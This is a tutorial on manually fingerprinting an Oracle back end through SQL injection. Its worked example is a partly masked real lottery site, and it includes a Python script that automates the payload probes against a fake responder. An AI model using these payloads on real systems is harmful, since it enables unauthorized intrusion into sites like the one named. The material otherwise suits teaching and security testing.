A large online lottery site has an injection point at the following link: http://www.*****china.com/jst/md_end.jsp?id=76. This injection point is used as an example to walk through manual detection of Oracle SQL injection.
Determining the injection point
Append a single quotation mark to the link. The page returns "java.sql.SQLException: ORA-01756" (quoted string not properly terminated). ORA- error codes are Oracle-specific, so the back end can be provisionally identified as Oracle.
Append "/*" to the link and an error page is returned, which suggests the database is not MySQL. Append "--" to the link and the normal page is returned, which suggests MSSQL or Oracle (both accept "--" as a line comment). To tell them apart, submit two queries that reference Oracle-specific objects (user_tables is an Oracle data dictionary view, and dual is Oracle's one-row dummy table):
http://www.****china.com/jst/md_end.jsp?id=76 and (select count(*) from user_tables)>0 --
http://www.****china.com/jst/md_end.jsp?id=76 and (select count(*) from dual)>0 --
Both return the normal page (Figure 1), confirming an Oracle database. Note that a normal page by itself is weak evidence, since an application that ignores the parameter would also return it; pair each true condition with a false one (for example, a count from dual compared against 1, which is false because dual has exactly one row) and confirm that the two responses differ.
Figure 1 Confirm Oracle Injection
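The probe sequence above, automated as an added example (this is not code from the original article). It mirrors the page's steps (quote, "/*", "--", user_tables, dual) and adds a true/false pair on dual plus an MSSQL-only object (sysobjects) as a differential check. The `fetch` callable, the base URL `http://example.invalid/jst/md_end.jsp`, and the fake responder that stands in for the target are assumptions; in practice `fetch` would be something like `lambda url: requests.get(url).text`.

```python
"""Manual Oracle injection fingerprinting, automated. Added example, not the article's code."""
import re
from urllib.parse import quote, unquote

# Payloads appended to the parameter value. The first five follow the page's manual
# steps; dual_false and mssql_table are added differential checks.
PROBES = {
    "quote": "'",
    "mysql_comment": " /*",
    "dash_comment": " --",
    "user_tables_true": " and (select count(*) from user_tables)>0 --",
    "dual_true": " and (select count(*) from dual)>0 --",
    "dual_false": " and (select count(*) from dual)>1 --",   # false: dual has exactly 1 row
    "mssql_table": " and (select count(*) from sysobjects)>0 --",  # MSSQL-only object
}


def fingerprint(fetch, base_url, param, value):
    """Run the probes; fetch(url) must return the response body as a str."""
    def get(payload):
        return fetch(f"{base_url}?{param}={quote(value + payload, safe='')}")

    baseline = get("")
    quote_resp = get(PROBES["quote"])
    m = re.search(r"ORA-\d{5}", quote_resp)
    result = {
        "error_signature": m.group(0) if m else None,
        "mysql_comment_breaks": get(PROBES["mysql_comment"]) != baseline,
        "dash_comment_ok": get(PROBES["dash_comment"]) == baseline,
        "user_tables_ok": get(PROBES["user_tables_true"]) == baseline,
        "dual_true_ok": get(PROBES["dual_true"]) == baseline,
        "dual_false_differs": get(PROBES["dual_false"]) != baseline,
        "sysobjects_ok": get(PROBES["mssql_table"]) == baseline,
    }
    if quote_resp == baseline and not result["dual_false_differs"]:
        # Every probe looks like the baseline: the parameter is probably not reaching SQL.
        result["verdict"] = "not-injectable"
    elif (result["error_signature"] and result["user_tables_ok"]
          and result["dual_true_ok"] and result["dual_false_differs"]):
        result["verdict"] = "oracle"
    else:
        result["verdict"] = "inconclusive"
    return result


# --- Constructed stand-in for the target (assumption: mimics the responses the page reports) ---
NORMAL = "<html>lottery result for draw 76</html>"
EMPTY = "<html></html>"            # what a false condition returns: page with no data
ERROR = "<html>500 Internal Server Error</html>"
ROW_COUNTS = {"dual": 1, "user_tables": 12}   # constructed row counts for the fake


def fake_oracle_fetch(url):
    value = unquote(url.split("?", 1)[1].split("=", 1)[1])
    if value == "76":
        return NORMAL
    if "'" in value:
        return "java.sql.SQLException: ORA-01756: quoted string not properly terminated"
    if "/*" in value:
        return ERROR
    tail = value[len("76"):].strip()
    if tail == "--":
        return NORMAL
    m = re.fullmatch(r"and \(select count\(\*\) from (\w+)\)>(\d+) --", tail)
    if not m:
        return ERROR
    rows = ROW_COUNTS.get(m.group(1))
    if rows is None:
        return ERROR      # unknown object (e.g. sysobjects) errors on Oracle
    return NORMAL if rows > int(m.group(2)) else EMPTY


def fake_static_fetch(url):
    """A parameter the application never passes to SQL: everything is the baseline."""
    return NORMAL


if __name__ == "__main__":
    for name, f in (("target", fake_oracle_fetch), ("static", fake_static_fetch)):
        print(name, fingerprint(f, "http://example.invalid/jst/md_end.jsp", "id", "76"))
```

The verdict requires all three things to line up: an Oracle error signature, Oracle-only objects resolving, and the false condition producing a different page. Any one of them alone (in particular a lone "normal page") is reported as inconclusive.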